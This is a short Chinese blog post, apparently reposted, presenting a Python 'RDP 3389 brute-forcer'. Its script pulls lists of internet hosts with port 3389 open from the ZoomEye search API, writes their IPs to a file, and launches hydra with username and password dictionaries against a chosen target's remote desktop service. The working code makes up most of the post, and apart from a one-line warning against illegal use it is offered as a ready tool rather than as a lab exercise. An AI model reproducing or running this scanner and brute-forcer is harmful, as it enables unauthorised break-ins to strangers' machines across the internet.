python 3389爆破機


前言:

 = =上學后的第一個星期假期,寫了個3389爆破器

   -

0x01

准備:

hydra

鍾馗之眼API

0x02代碼:

import optparse
import os
import requests
import time
def mian():
    print('[!]切記不要做違法的事情。否則后果自負')
    usage='[help -s  掃描全網3389]'
    parser=optparse.OptionParser(usage)
    parser.add_option('-s',action='store_true',dest='ji',help='掃描全網3389')
    parser.add_option('-b',dest='bao',help='爆破字典(username)')
    parser.add_option('-p',dest='passs',help='爆破字典(password)')
    parser.add_option('-x',dest='host',help='目標')
    (options,args)=parser.parse_args()
    if options.ji:
        Ji()
    elif options.bao and options.host and options.passs:
        bao=options.bao
        ip=options.host
        passs=options.passs
        Bao(bao,ip,passs)
    else:
        parser.print_help()
        exit()
def Ji():
    for r in range(1,10):
        time.sleep(1)
        g='https://api.zoomeye.org/host/search?query=port:3389&page={}'.format(r)
        headers={"Authorization":"JWT token"}
        r=requests.get(g,headers=headers)
        sd=r.json()
        rsd=sd['matches'][0:]
        for l in rsd:
            print(l['ip'])
            owe=l['ip']
            with open('3389.txt','a') as p:
                p.write(owe+'\n')
def Bao(bao,ip,passs):
    baopo=os.system('hydra.exe -L {} -P {} rdp://{}'.format(bao,passs,ip))
if __name__ == '__main__':
    mian()

  效果圖:

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM